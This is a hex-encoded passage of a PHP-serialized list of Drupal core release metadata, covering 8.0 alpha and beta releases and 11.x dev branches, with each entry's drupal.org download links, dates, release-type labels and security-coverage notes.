33a22646f776e6c6f61645f6c696e6b223b733a36343a2268747470733a2f2f6674702e64727570616c2e6f72672f66696c65732f70726f6a656374732f64727570616c2d382e302e302d6265746131332e7461722e677a223b733a343a2264617465223b733a31303a2231343338313934353339223b733a353a2266696c6573223b733a303a22223b733a353a227465726d73223b613a313a7b733a31323a2252656c656173652074797065223b613a313a7b693a303b733a383a22496e736563757265223b7d7d733a383a227365637572697479223b733a36303a22426574612072656c656173657320617265206e6f7420636f76657265642062792044727570616c2073656375726974792061647669736f726965732e223b7d733a31323a22382e302e302d626574613132223b613a31303a7b733a343a226e616d65223b733a31393a2264727570616c20382e302e302d626574613132223b733a373a2276657273696f6e223b733a31323a22382e302e302d626574613132223b733a333a22746167223b733a31323a22382e302e302d626574613132223b733a363a22737461747573223b733a393a227075626c6973686564223b733a31323a2272656c656173655f6c696e6b223b733a35393a2268747470733a2f2f7777772e64727570616c2e6f72672f70726f6a6563742f64727570616c2f72656c65617365732f382e302e302d626574613132223b733a31333a22646f776e6c6f61645f6c696e6b223b733a36343a2268747470733a2f2f6674702e64727570616c2e6f72672f66696c65732f70726f6a656374732f64727570616c2d382e302e302d6265746131322e7461722e677a223b733a343a2264617465223b733a31303a2231343335363031353833223b733a353a2266696c6573223b733a303a22223b733a353a227465726d73223b613a313a7b733a31323a2252656c656173652074797065223b613a313a7b693a303b733a383a22496e736563757265223b7d7d733a383a227365637572697479223b733a36303a22426574612072656c656173657320617265206e6f7420636f76657265642062792044727570616c2073656375726974792061647669736f726965732e223b7d733a31323a22382e302e302d626574613131223b613a31303a7b733a343a226e616d65223b733a31393a2264727570616c20382e302e302d626574613131223b733a373a2276657273696f6e223b733a31323a22382e302e302d626574613131223b733a333a22746167223b733a31323a22382e302e302d626574613131223b733a363a22737461747573223b733a393a227075626c6973686564223b733a31323a2272656c656173655f6c696e6b223b733a35393a2268747470733a2f2f7777772e64727570616c2e6f72672f70726f6a6563742f64727570616c2f72656c65617365732f382e302e302d626574613131223b733a31333a22646f776e6c6f61645f6c696e6b223b733a36343a2268747470733a2f2f6674702e64727570616c2e6f72672f66696c65732f70726f6a656374732f64727570616c2d382e302e302d6265746131312e7461722e677a223b733a343a2264617465223b733a31303a2231343332373538343831223b733a353a2266696c6573223b733a303a22223b733a353a227465726d73223b613a313a7b733a31323a2252656c656173652074797065223b613a313a7b693a303b733a383a22496e736563757265223b7d7d733a383a227365637572697479223b733a36303a22426574612072656c656173657320617265206e6f7420636f76657265642062792044727570616c2073656375726974792061647669736f726965732e223b7d733a31323a22382e302e302d626574613130223b613a31303a7b733a343a226e616d65223b733a31393a2264727570616c20382e302e302d626574613130223b733a373a2276657273696f6e223b733a31323a22382e302e302d626574613130223b733a333a22746167223b733a31323a22382e302e302d626574613130223b733a363a22737461747573223b733a393a227075626c6973686564223b733a31323a2272656c656173655f6c696e6b223b733a35393a2268747470733a2f2f7777772e64727570616c2e6f72672f70726f6a6563742f64727570616c2f72656c65617365732f382e302e302d626574613130223b733a31333a22646f776e6c6f61645f6c696e6b223b733a36343a2268747470733a2f2f6674702e64727570616c2e6f72672f66696c65732f70726f6a656374732f64727570616c2d382e302e302d6265746131302e7461722e677a223b733a343a2264617465223b733a31303a2231343330333134363831223b733a353a2266696c6573223b733a303a22223b733a353a227465726d73223b613a313a7b733a31323a2252656c656173652074797065223b613a313a7b693a303b733a383a22496e736563757265223b7d7d733a383a227365637572697479223b733a36303a22426574612072656c656173657320617265206e6f7420636f76657265642062792044727570616c2073656375726974792061647669736f726965732e223b7d733a31313a22382e302e302d6265746139223b613a31303a7b733a343a226e616d65223b733a31383a2264727570616c20382e302e302d6265746139223b733a373a2276657273696f6e223b733a31313a22382e302e302d6265746139223b733a333a22746167223b733a31313a22382e302e302d6265746139223b733a363a22737461747573223b733a393a227075626c6973686564223b733a31323a2272656c656173655f6c696e6b223b733a35383a2268747470733a2f2f7777772e64727570616c2e6f72672f70726f6a6563742f64727570616c2f72656c65617365732f382e302e302d6265746139223b733a31333a22646f776e6c6f61645f6c696e6b223b733a36333a2268747470733a2f2f6674702e64727570616c2e6f72672f66696c65732f70726f6a656374732f64727570616c2d382e302e302d62657461392e7461722e677a223b733a343a2264617465223b733a31303a2231343237323939393831223b733a353a2266696c6573223b733a303a22223b733a353a227465726d73223b613a313a7b733a31323a2252656c656173652074797065223b613a313a7b693a303b733a383a22496e736563757265223b7d7d733a383a227365637572697479223b733a36303a22426574612072656c656173657320617265206e6f7420636f76657265642062792044727570616c2073656375726974792061647669736f726965732e223b7d733a31313a22382e302e302d6265746137223b613a31303a7b733a343a226e616d65223b733a31383a2264727570616c20382e302e302d6265746137223b733a373a2276657273696f6e223b733a31313a22382e302e302d6265746137223b733a333a22746167223b733a31313a22382e302e302d6265746137223b733a363a22737461747573223b733a393a227075626c6973686564223b733a31323a2272656c656173655f6c696e6b223b733a35383a2268747470733a2f2f7777772e64727570616c2e6f72672f70726f6a6563742f64727570616c2f72656c65617365732f382e302e302d6265746137223b733a31333a22646f776e6c6f61645f6c696e6b223b733a36333a2268747470733a2f2f6674702e64727570616c2e6f72672f66696c65732f70726f6a656374732f64727570616c2d382e302e302d62657461372e7461722e677a223b733a343a2264617465223b733a31303a2231343234383735333831223b733a353a2266696c6573223b733a303a22223b733a353a227465726d73223b613a313a7b733a31323a2252656c656173652074797065223b613a313a7b693a303b733a383a22496e736563757265223b7d7d733a383a227365637572697479223b733a36303a22426574612072656c656173657320617265206e6f7420636f76657265642062792044727570616c2073656375726974792061647669736f726965732e223b7d733a31313a22382e302e302d6265746136223b613a31303a7b733a343a226e616d65223b733a31383a2264727570616c20382e302e302d6265746136223b733a373a2276657273696f6e223b733a31313a22382e302e302d6265746136223b733a333a22746167223b733a31313a22382e302e302d6265746136223b733a363a22737461747573223b733a393a227075626c6973686564223b733a31323a2272656c656173655f6c696e6b223b733a35383a2268747470733a2f2f7777772e64727570616c2e6f72672f70726f6a6563742f64727570616c2f72656c65617365732f382e302e302d6265746136223b733a31333a22646f776e6c6f61645f6c696e6b223b733a36333a2268747470733a2f2f6674702e64727570616c2e6f72672f66696c65732f70726f6a656374732f64727570616c2d382e302e302d62657461362e7461722e677a223b733a343a2264617465223b733a31303a2231343232343433383030223b733a353a2266696c6573223b733a303a22223b733a353a227465726d73223b613a313a7b733a31323a2252656c656173652074797065223b613a313a7b693a303b733a383a22496e736563757265223b7d7d733a383a227365637572697479223b733a36303a22426574612072656c656173657320617265206e6f7420636f76657265642062792044727570616c2073656375726974792061647669736f726965732e223b7d733a31313a22382e302e302d6265746134223b613a31303a7b733a343a226e616d65223b733a31383a2264727570616c20382e302e302d6265746134223b733a373a2276657273696f6e223b733a31313a22382e302e302d6265746134223b733a333a22746167223b733a31313a22382e302e302d6265746134223b733a363a22737461747573223b733a393a227075626c6973686564223b733a31323a2272656c656173655f6c696e6b223b733a35383a2268747470733a2f2f7777772e64727570616c2e6f72672f70726f6a6563742f64727570616c2f72656c65617365732f382e302e302d6265746134223b733a31333a22646f776e6c6f61645f6c696e6b223b733a36333a2268747470733a2f2f6674702e64727570616c2e6f72672f66696c65732f70726f6a656374732f64727570616c2d382e302e302d62657461342e7461722e677a223b733a343a2264617465223b733a31303a2231343138383235323830223b733a353a2266696c6573223b733a303a22223b733a353a227465726d73223b613a313a7b733a31323a2252656c656173652074797065223b613a313a7b693a303b733a383a22496e736563757265223b7d7d733a383a227365637572697479223b733a36303a22426574612072656c656173657320617265206e6f7420636f76657265642062792044727570616c2073656375726974792061647669736f726965732e223b7d733a31313a22382e302e302d6265746133223b613a31303a7b733a343a226e616d65223b733a31383a2264727570616c20382e302e302d6265746133223b733a373a2276657273696f6e223b733a31313a22382e302e302d6265746133223b733a333a22746167223b733a31313a22382e302e302d6265746133223b733a363a22737461747573223b733a393a227075626c6973686564223b733a31323a2272656c656173655f6c696e6b223b733a35383a2268747470733a2f2f7777772e64727570616c2e6f72672f70726f6a6563742f64727570616c2f72656c65617365732f382e302e302d6265746133223b733a31333a22646f776e6c6f61645f6c696e6b223b733a36333a2268747470733a2f2f6674702e64727570616c2e6f72672f66696c65732f70726f6a656374732f64727570616c2d382e302e302d62657461332e7461722e677a223b733a343a2264617465223b733a31303a2231343135373937333830223b733a353a2266696c6573223b733a303a22223b733a353a227465726d73223b613a313a7b733a31323a2252656c656173652074797065223b613a313a7b693a303b733a383a22496e736563757265223b7d7d733a383a227365637572697479223b733a36303a22426574612072656c656173657320617265206e6f7420636f76657265642062792044727570616c2073656375726974792061647669736f726965732e223b7d733a31313a22382e302e302d6265746132223b613a31303a7b733a343a226e616d65223b733a31383a2264727570616c20382e302e302d6265746132223b733a373a2276657273696f6e223b733a31313a22382e302e302d6265746132223b733a333a22746167223b733a31313a22382e302e302d6265746132223b733a363a22737461747573223b733a393a227075626c6973686564223b733a31323a2272656c656173655f6c696e6b223b733a35383a2268747470733a2f2f7777772e64727570616c2e6f72672f70726f6a6563742f64727570616c2f72656c65617365732f382e302e302d6265746132223b733a31333a22646f776e6c6f61645f6c696e6b223b733a36333a2268747470733a2f2f6674702e64727570616c2e6f72672f66696c65732f70726f6a656374732f64727570616c2d382e302e302d62657461322e7461722e677a223b733a343a2264617465223b733a31303a2231343133333934313631223b733a353a2266696c6573223b733a303a22223b733a353a227465726d73223b613a313a7b733a31323a2252656c656173652074797065223b613a323a7b693a303b733a383a22496e736563757265223b693a313b733a31353a22536563757269747920757064617465223b7d7d733a383a227365637572697479223b733a36303a22426574612072656c656173657320617265206e6f7420636f76657265642062792044727570616c2073656375726974792061647669736f726965732e223b7d733a31313a22382e302e302d6265746131223b613a31303a7b733a343a226e616d65223b733a31383a2264727570616c20382e302e302d6265746131223b733a373a2276657273696f6e223b733a31313a22382e302e302d6265746131223b733a333a22746167223b733a31313a22382e302e302d6265746131223b733a363a22737461747573223b733a393a227075626c6973686564223b733a31323a2272656c656173655f6c696e6b223b733a35383a2268747470733a2f2f7777772e64727570616c2e6f72672f70726f6a6563742f64727570616c2f72656c65617365732f382e302e302d6265746131223b733a31333a22646f776e6c6f61645f6c696e6b223b733a36333a2268747470733a2f2f6674702e64727570616c2e6f72672f66696c65732f70726f6a656374732f64727570616c2d382e302e302d62657461312e7461722e677a223b733a343a2264617465223b733a31303a2231343132313437303330223b733a353a2266696c6573223b733a303a22223b733a353a227465726d73223b613a313a7b733a31323a2252656c656173652074797065223b613a313a7b693a303b733a383a22496e736563757265223b7d7d733a383a227365637572697479223b733a36303a22426574612072656c656173657320617265206e6f7420636f76657265642062792044727570616c2073656375726974792061647669736f726965732e223b7d733a31333a22382e302e302d616c7068613135223b613a31303a7b733a343a226e616d65223b733a32303a2264727570616c20382e302e302d616c7068613135223b733a373a2276657273696f6e223b733a31333a22382e302e302d616c7068613135223b733a333a22746167223b733a31333a22382e302e302d616c7068613135223b733a363a22737461747573223b733a393a227075626c6973686564223b733a31323a2272656c656173655f6c696e6b223b733a36303a2268747470733a2f2f7777772e64727570616c2e6f72672f70726f6a6563742f64727570616c2f72656c65617365732f382e302e302d616c7068613135223b733a31333a22646f776e6c6f61645f6c696e6b223b733a36353a2268747470733a2f2f6674702e64727570616c2e6f72672f66696c65732f70726f6a656374732f64727570616c2d382e302e302d616c70686131352e7461722e677a223b733a343a2264617465223b733a31303a2231343131313339363238223b733a353a2266696c6573223b733a303a22223b733a353a227465726d73223b613a313a7b733a31323a2252656c656173652074797065223b613a313a7b693a303b733a383a22496e736563757265223b7d7d733a383a227365637572697479223b733a36313a22416c7068612072656c656173657320617265206e6f7420636f76657265642062792044727570616c2073656375726974792061647669736f726965732e223b7d733a31333a22382e302e302d616c7068613134223b613a31303a7b733a343a226e616d65223b733a32303a2264727570616c20382e302e302d616c7068613134223b733a373a2276657273696f6e223b733a31333a22382e302e302d616c7068613134223b733a333a22746167223b733a31333a22382e302e302d616c7068613134223b733a363a22737461747573223b733a393a227075626c6973686564223b733a31323a2272656c656173655f6c696e6b223b733a36303a2268747470733a2f2f7777772e64727570616c2e6f72672f70726f6a6563742f64727570616c2f72656c65617365732f382e302e302d616c7068613134223b733a31333a22646f776e6c6f61645f6c696e6b223b733a36353a2268747470733a2f2f6674702e64727570616c2e6f72672f66696c65732f70726f6a656374732f64727570616c2d382e302e302d616c70686131342e7461722e677a223b733a343a2264617465223b733a31303a2231343037333434363238223b733a353a2266696c6573223b733a303a22223b733a353a227465726d73223b613a313a7b733a31323a2252656c656173652074797065223b613a313a7b693a303b733a383a22496e736563757265223b7d7d733a383a227365637572697479223b733a36313a22416c7068612072656c656173657320617265206e6f7420636f76657265642062792044727570616c2073656375726974792061647669736f726965732e223b7d733a31313a22382e302d616c7068613133223b613a31303a7b733a343a226e616d65223b733a31383a2264727570616c20382e302d616c7068613133223b733a373a2276657273696f6e223b733a31313a22382e302d616c7068613133223b733a333a22746167223b733a31313a22382e302d616c7068613133223b733a363a22737461747573223b733a393a227075626c6973686564223b733a31323a2272656c656173655f6c696e6b223b733a35383a2268747470733a2f2f7777772e64727570616c2e6f72672f70726f6a6563742f64727570616c2f72656c65617365732f382e302d616c7068613133223b733a31333a22646f776e6c6f61645f6c696e6b223b733a36333a2268747470733a2f2f6674702e64727570616c2e6f72672f66696c65732f70726f6a656374732f64727570616c2d382e302d616c70686131332e7461722e677a223b733a343a2264617465223b733a31303a2231343034323936363237223b733a353a2266696c6573223b733a303a22223b733a353a227465726d73223b613a313a7b733a31323a2252656c656173652074797065223b613a313a7b693a303b733a383a22496e736563757265223b7d7d733a383a227365637572697479223b733a36313a22416c7068612072656c656173657320617265206e6f7420636f76657265642062792044727570616c2073656375726974792061647669736f726965732e223b7d733a31313a22382e302d616c7068613132223b613a31303a7b733a343a226e616d65223b733a31383a2264727570616c20382e302d616c7068613132223b733a373a2276657273696f6e223b733a31313a22382e302d616c7068613132223b733a333a22746167223b733a31313a22382e302d616c7068613132223b733a363a22737461747573223b733a393a227075626c6973686564223b733a31323a2272656c656173655f6c696e6b223b733a35383a2268747470733a2f2f7777772e64727570616c2e6f72672f70726f6a6563742f64727570616c2f72656c65617365732f382e302d616c7068613132223b733a31333a22646f776e6c6f61645f6c696e6b223b733a36333a2268747470733a2f2f6674702e64727570616c2e6f72672f66696c65732f70726f6a656374732f64727570616c2d382e302d616c70686131322e7461722e677a223b733a343a2264617465223b733a31303a2231343031323933363237223b733a353a2266696c6573223b733a303a22223b733a353a227465726d73223b613a313a7b733a31323a2252656c656173652074797065223b613a323a7b693a303b733a393a22427567206669786573223b693a313b733a383a22496e736563757265223b7d7d733a383a227365637572697479223b733a36313a22416c7068612072656c656173657320617265206e6f7420636f76657265642062792044727570616c2073656375726974792061647669736f726965732e223b7d733a31313a22382e302d616c7068613131223b613a31303a7b733a343a226e616d65223b733a31383a2264727570616c20382e302d616c7068613131223b733a373a2276657273696f6e223b733a31313a22382e302d616c7068613131223b733a333a22746167223b733a31313a22382e302d616c7068613131223b733a363a22737461747573223b733a393a227075626c6973686564223b733a31323a2272656c656173655f6c696e6b223b733a35383a2268747470733a2f2f7777772e64727570616c2e6f72672f70726f6a6563742f64727570616c2f72656c65617365732f382e302d616c7068613131223b733a31333a22646f776e6c6f61645f6c696e6b223b733a36333a2268747470733a2f2f6674702e64727570616c2e6f72672f66696c65732f70726f6a656374732f64727570616c2d382e302d616c70686131312e7461722e677a223b733a343a2264617465223b733a31303a2231333938323439323237223b733a353a2266696c6573223b733a303a22223b733a353a227465726d73223b613a313a7b733a31323a2252656c656173652074797065223b613a313a7b693a303b733a383a22496e736563757265223b7d7d733a383a227365637572697479223b733a36313a22416c7068612072656c656173657320617265206e6f7420636f76657265642062792044727570616c2073656375726974792061647669736f726965732e223b7d733a31313a22382e302d616c7068613130223b613a31303a7b733a343a226e616d65223b733a31383a2264727570616c20382e302d616c7068613130223b733a373a2276657273696f6e223b733a31313a22382e302d616c7068613130223b733a333a22746167223b733a31313a22382e302d616c7068613130223b733a363a22737461747573223b733a393a227075626c6973686564223b733a31323a2272656c656173655f6c696e6b223b733a35383a2268747470733a2f2f7777772e64727570616c2e6f72672f70726f6a6563742f64727570616c2f72656c65617365732f382e302d616c7068613130223b733a31333a22646f776e6c6f61645f6c696e6b223b733a36333a2268747470733a2f2f6674702e64727570616c2e6f72672f66696c65732f70726f6a656374732f64727570616c2d382e302d616c70686131302e7461722e677a223b733a343a2264617465223b733a31303a2231333935323331353536223b733a353a2266696c6573223b733a303a22223b733a353a227465726d73223b613a313a7b733a31323a2252656c656173652074797065223b613a313a7b693a303b733a383a22496e736563757265223b7d7d733a383a227365637572697479223b733a36313a22416c7068612072656c656173657320617265206e6f7420636f76657265642062792044727570616c2073656375726974792061647669736f726965732e223b7d733a31303a22382e302d616c70686139223b613a31303a7b733a343a226e616d65223b733a31373a2264727570616c20382e302d616c70686139223b733a373a2276657273696f6e223b733a31303a22382e302d616c70686139223b733a333a22746167223b733a31303a22382e302d616c70686139223b733a363a22737461747573223b733a393a227075626c6973686564223b733a31323a2272656c656173655f6c696e6b223b733a35373a2268747470733a2f2f7777772e64727570616c2e6f72672f70726f6a6563742f64727570616c2f72656c65617365732f382e302d616c70686139223b733a31333a22646f776e6c6f61645f6c696e6b223b733a36323a2268747470733a2f2f6674702e64727570616c2e6f72672f66696c65732f70726f6a656374732f64727570616c2d382e302d616c706861392e7461722e677a223b733a343a2264617465223b733a31303a2231333932383036303035223b733a353a2266696c6573223b733a303a22223b733a353a227465726d73223b613a313a7b733a31323a2252656c656173652074797065223b613a323a7b693a303b733a31323a224e6577206665617475726573223b693a313b733a383a22496e736563757265223b7d7d733a383a227365637572697479223b733a36313a22416c7068612072656c656173657320617265206e6f7420636f76657265642062792044727570616c2073656375726974792061647669736f726965732e223b7d733a31303a22382e302d616c70686138223b613a31303a7b733a343a226e616d65223b733a31373a2264727570616c20382e302d616c70686138223b733a373a2276657273696f6e223b733a31303a22382e302d616c70686138223b733a333a22746167223b733a31303a22382e302d616c70686138223b733a363a22737461747573223b733a393a227075626c6973686564223b733a31323a2272656c656173655f6c696e6b223b733a35373a2268747470733a2f2f7777772e64727570616c2e6f72672f70726f6a6563742f64727570616c2f72656c65617365732f382e302d616c70686138223b733a31333a22646f776e6c6f61645f6c696e6b223b733a36323a2268747470733a2f2f6674702e64727570616c2e6f72672f66696c65732f70726f6a656374732f64727570616c2d382e302d616c706861382e7461722e677a223b733a343a2264617465223b733a31303a2231333930333933313035223b733a353a2266696c6573223b733a303a22223b733a353a227465726d73223b613a313a7b733a31323a2252656c656173652074797065223b613a333a7b693a303b733a393a22427567206669786573223b693a313b733a31323a224e6577206665617475726573223b693a323b733a383a22496e736563757265223b7d7d733a383a227365637572697479223b733a36313a22416c7068612072656c656173657320617265206e6f7420636f76657265642062792044727570616c2073656375726974792061647669736f726965732e223b7d733a31303a22382e302d616c70686137223b613a31303a7b733a343a226e616d65223b733a31373a2264727570616c20382e302d616c70686137223b733a373a2276657273696f6e223b733a31303a22382e302d616c70686137223b733a333a22746167223b733a31303a22382e302d616c70686137223b733a363a22737461747573223b733a393a227075626c6973686564223b733a31323a2272656c656173655f6c696e6b223b733a35373a2268747470733a2f2f7777772e64727570616c2e6f72672f70726f6a6563742f64727570616c2f72656c65617365732f382e302d616c70686137223b733a31333a22646f776e6c6f61645f6c696e6b223b733a36323a2268747470733a2f2f6674702e64727570616c2e6f72672f66696c65732f70726f6a656374732f64727570616c2d382e302d616c706861372e7461722e677a223b733a343a2264617465223b733a31303a2231333837333939373035223b733a353a2266696c6573223b733a303a22223b733a353a227465726d73223b613a313a7b733a31323a2252656c656173652074797065223b613a333a7b693a303b733a393a22427567206669786573223b693a313b733a31323a224e6577206665617475726573223b693a323b733a383a22496e736563757265223b7d7d733a383a227365637572697479223b733a36313a22416c7068612072656c656173657320617265206e6f7420636f76657265642062792044727570616c2073656375726974792061647669736f726965732e223b7d733a31303a22382e302d616c70686136223b613a31303a7b733a343a226e616d65223b733a31373a2264727570616c20382e302d616c70686136223b733a373a2276657273696f6e223b733a31303a22382e302d616c70686136223b733a333a22746167223b733a31303a22382e302d616c70686136223b733a363a22737461747573223b733a393a227075626c6973686564223b733a31323a2272656c656173655f6c696e6b223b733a35373a2268747470733a2f2f7777772e64727570616c2e6f72672f70726f6a6563742f64727570616c2f72656c65617365732f382e302d616c70686136223b733a31333a22646f776e6c6f61645f6c696e6b223b733a36323a2268747470733a2f2f6674702e64727570616c2e6f72672f66696c65732f70726f6a656374732f64727570616c2d382e302d616c706861362e7461722e677a223b733a343a2264617465223b733a31303a2231333835313533333035223b733a353a2266696c6573223b733a303a22223b733a353a227465726d73223b613a313a7b733a31323a2252656c656173652074797065223b613a323a7b693a303b733a393a22427567206669786573223b693a313b733a383a22496e736563757265223b7d7d733a383a227365637572697479223b733a36313a22416c7068612072656c656173657320617265206e6f7420636f76657265642062792044727570616c2073656375726974792061647669736f726965732e223b7d733a31303a22382e302d616c70686135223b613a31303a7b733a343a226e616d65223b733a31373a2264727570616c20382e302d616c70686135223b733a373a2276657273696f6e223b733a31303a22382e302d616c70686135223b733a333a22746167223b733a31303a22382e302d616c70686135223b733a363a22737461747573223b733a393a227075626c6973686564223b733a31323a2272656c656173655f6c696e6b223b733a35373a2268747470733a2f2f7777772e64727570616c2e6f72672f70726f6a6563742f64727570616c2f72656c65617365732f382e302d616c70686135223b733a31333a22646f776e6c6f61645f6c696e6b223b733a36323a2268747470733a2f2f6674702e64727570616c2e6f72672f66696c65732f70726f6a656374732f64727570616c2d382e302d616c706861352e7461722e677a223b733a343a2264617465223b733a31303a2231333834383530333035223b733a353a2266696c6573223b733a303a22223b733a353a227465726d73223b613a313a7b733a31323a2252656c656173652074797065223b613a313a7b693a303b733a383a22496e736563757265223b7d7d733a383a227365637572697479223b733a36313a22416c7068612072656c656173657320617265206e6f7420636f76657265642062792044727570616c2073656375726974792061647669736f726965732e223b7d733a31303a22382e302d616c70686134223b613a31303a7b733a343a226e616d65223b733a31373a2264727570616c20382e302d616c70686134223b733a373a2276657273696f6e223b733a31303a22382e302d616c70686134223b733a333a22746167223b733a31303a22382e302d616c70686134223b733a363a22737461747573223b733a393a227075626c6973686564223b733a31323a2272656c656173655f6c696e6b223b733a35373a2268747470733a2f2f7777772e64727570616c2e6f72672f70726f6a6563742f64727570616c2f72656c65617365732f382e302d616c70686134223b733a31333a22646f776e6c6f61645f6c696e6b223b733a36323a2268747470733a2f2f6674702e64727570616c2e6f72672f66696c65732f70726f6a656374732f64727570616c2d382e302d616c706861342e7461722e677a223b733a343a2264617465223b733a31303a2231333832303932333133223b733a353a2266696c6573223b733a303a22223b733a353a227465726d73223b613a313a7b733a31323a2252656c656173652074797065223b613a333a7b693a303b733a31323a224e6577206665617475726573223b693a313b733a393a22427567206669786573223b693a323b733a383a22496e736563757265223b7d7d733a383a227365637572697479223b733a36313a22416c7068612072656c656173657320617265206e6f7420636f76657265642062792044727570616c2073656375726974792061647669736f726965732e223b7d733a31303a22382e302d616c70686133223b613a31303a7b733a343a226e616d65223b733a31373a2264727570616c20382e302d616c70686133223b733a373a2276657273696f6e223b733a31303a22382e302d616c70686133223b733a333a22746167223b733a31303a22382e302d616c70686133223b733a363a22737461747573223b733a393a227075626c6973686564223b733a31323a2272656c656173655f6c696e6b223b733a35373a2268747470733a2f2f7777772e64727570616c2e6f72672f70726f6a6563742f64727570616c2f72656c65617365732f382e302d616c70686133223b733a31333a22646f776e6c6f61645f6c696e6b223b733a36323a2268747470733a2f2f6674702e64727570616c2e6f72672f66696c65732f70726f6a656374732f64727570616c2d382e302d616c706861332e7461722e677a223b733a343a2264617465223b733a31303a2231333738333033333037223b733a353a2266696c6573223b733a303a22223b733a353a227465726d73223b613a313a7b733a31323a2252656c656173652074797065223b613a333a7b693a303b733a31323a224e6577206665617475726573223b693a313b733a393a22427567206669786573223b693a323b733a383a22496e736563757265223b7d7d733a383a227365637572697479223b733a36313a22416c7068612072656c656173657320617265206e6f7420636f76657265642062792044727570616c2073656375726974792061647669736f726965732e223b7d733a31303a22382e302d616c70686132223b613a31303a7b733a343a226e616d65223b733a31373a2264727570616c20382e302d616c70686132223b733a373a2276657273696f6e223b733a31303a22382e302d616c70686132223b733a333a22746167223b733a31303a22382e302d616c70686132223b733a363a22737461747573223b733a393a227075626c6973686564223b733a31323a2272656c656173655f6c696e6b223b733a35373a2268747470733a2f2f7777772e64727570616c2e6f72672f70726f6a6563742f64727570616c2f72656c65617365732f382e302d616c70686132223b733a31333a22646f776e6c6f61645f6c696e6b223b733a36323a2268747470733a2f2f6674702e64727570616c2e6f72672f66696c65732f70726f6a656374732f64727570616c2d382e302d616c706861322e7461722e677a223b733a343a2264617465223b733a31303a2231333732303639353633223b733a353a2266696c6573223b733a303a22223b733a353a227465726d73223b613a313a7b733a31323a2252656c656173652074797065223b613a313a7b693a303b733a383a22496e736563757265223b7d7d733a383a227365637572697479223b733a36313a22416c7068612072656c656173657320617265206e6f7420636f76657265642062792044727570616c2073656375726974792061647669736f726965732e223b7d733a31303a2231312e342e782d646576223b613a31303a7b733a343a226e616d65223b733a31373a2264727570616c2031312e342e782d646576223b733a373a2276657273696f6e223b733a31303a2231312e342e782d646576223b733a333a22746167223b733a363a2231312e342e78223b733a363a22737461747573223b733a393a227075626c6973686564223b733a31323a2272656c656173655f6c696e6b223b733a35373a2268747470733a2f2f7777772e64727570616c2e6f72672f70726f6a6563742f64727570616c2f72656c65617365732f31312e342e782d646576223b733a31333a22646f776e6c6f61645f6c696e6b223b733a36323a2268747470733a2f2f6674702e64727570616c2e6f72672f66696c65732f70726f6a656374732f64727570616c2d31312e342e782d6465762e7461722e677a223b733a343a2264617465223b733a31303a2231373837373832383339223b733a353a2266696c6573223b733a303a22223b733a353a227465726d73223b613a313a7b733a31323a2252656c656173652074797065223b613a323a7b693a303b733a393a22427567206669786573223b693a313b733a31323a224e6577206665617475726573223b7d7d733a383a227365637572697479223b733a35393a224465762072656c656173657320617265206e6f7420636f76657265642062792044727570616c2073656375726974792061647669736f726965732e223b7d733a31303a2231312e332e782d646576223b613a31303a7b733a343a226e616d65223b733a31373a2264727570616c2031312e332e782d646576223b733a373a2276657273696f6e223b733a31303a2231312e332e782d646576223b733a333a22746167223b733a363a2231312e332e78223b733a363a22737461747573223b733a393a227075626c6973686564223b733a31323a2272656c656173655f6c696e6b223b733a35373a2268747470733a2f2f7777772e64727570616c2e6f72672f70726f6a6563742f64727570616c2f72656c65617365732f31312e332e782d646576223b733a31333a22646f776e6c6f61645f6c696e6b223b733a36323a2268747470733a2f2f6674702e64727570616c2e6f72672f66696c65732f70726f6a656374732f64727570616c2d31312e332e782d6465762e7461722e677a223b733a343a2264617465223b733a31303a2231373836393636313037223b733a353a2266696c6573223b733a303a22223b733a353a227465726d73223b613a313a7b733a31323a2252656c656173652074797065223b613a323a7b693a303b733a393a22427567206669786573223b693a313b733a31323a224e6577206665617475726573223b7d7d733a383a227365637572697479223b733a35393a224465762072656c656173657320617265206e6f7420636f76657265642062792044727570616c2073656375726974792061647669736f726965732e223b7d733a31303a2231312e322e782d646576223b613a31303a7b733a343a226e616d65223b733a31373a2264727570616c2031312e322e782d646576223b733a373a2276657273696f6e223b733a31303a2231312e322e782d646576223b733a333a22746167223b733a363a2231312e322e78223b733a363a22737461747573223b733a393a227075626c6973686564223b733a31323a2272656c656173655f6c696e6b223b733a35373a2268747470733a2f2f7777772e64727570616c2e6f72672f70726f6a6563742f64727570616c2f72656c65617365732f31312e322e782d646576223b733a31333a22646f776e6c6f61645f6c696e6b223b733a36323a2268747470733a2f2f6674702e64727570616c2e6f72672f66696c65732f70726f6a656374732f64727570616c2d31312e322e782d6465762e7461722e677a223b733a343a2264617465223b733a31303a2231373739393735363233223b733a353a2266696c6573223b733a303a22223b733a353a227465726d73223b613a313a7b733a31323a2252656c656173652074797065223b613a323a7b693a303b733a393a22427567206669786573223b693a313b733a31323a224e6577206665617475726573223b7d7d733a383a227365637572697479223b733a35393a224465762072656c656173657320617265206e6f7420636f76657265642062792044727570616c2073656375726974792061647669736f726965732e223b7d733a31303a2231312e312e782d646576223b613a31303a7b733a343a226e616d65223b733a31373a2264727570616c2031312e312e782d646576223b733a373a2276657273696f6e223b733a31303a2231312e312e782d646576223b733a333a22746167223b733a363a2231312e312e78223b733a363a22737461747573223b733a393a227075626c6973686564223b733a31323a2272656c656173655f6c696e6b223b733a35373a2268747470733a2f2f7777772e64727570616c2e6f72672f70726f6a6563742f64727570616c2f72656c65617365732f31312e312e782d646576223b733a31333a22646f776e6c6f61645f6c696e6b223b733a36323a2268747470733a2f2f6674702e64727570616c2e6f72672f66696c65732f70726f6a656374732f64727570616c2d31312e312e782d6465762e7461722e677a223b733a343a2264617465223b733a31303a2231373739333135303535223b733a353a2266696c6573223b733a303a22223b733a353a227465726d73223b613a313a7b733a31323a2252656c656173652074797065223b613a323a7b693a303b733a393a22427567206669786573223b693a313b733a31323a224e6577206665617475726573223b7d7d733a383a227365637572697479223b733a35393a224465762072656c656173657320617265206e6f7420636f76657265642062792044727570616c2073656375726974792061647669736f726965732e223b7d733a31303a2231312e302e782d646576223b613a31303a7b733a343a226e616d65223b733a31373a2264727570616c2031312e302e782d646576223b733a373a2276657273696f6e223b733a31303a2231312e302e782d646576223b733a333a22746167223b733a363a2231312e302e78223b733a363a22737461747573223b733a393a227075626c6973686564223b733a31323a2272656c656173655f6c696e6b223b733a35373a2268747470733a2f2f7777772e64727570616c2e6f72672f70726f6a6563742f64727570616c2f72656c65617365732f31312e302e782d646576223b733a31333a22646f776e6c6f61645f6c696e6b223b733a36323a2268747470733a2f2f6674702e64727570616c2e6f72672f66696c65732f70726f6a656374732f64727570616c2d31312e302e782d6465762e7461722e677a223b733a343a2264617465223b733a31303a2231373436343835353532223b733a353a2266696c6573223b733a303a22223b733a3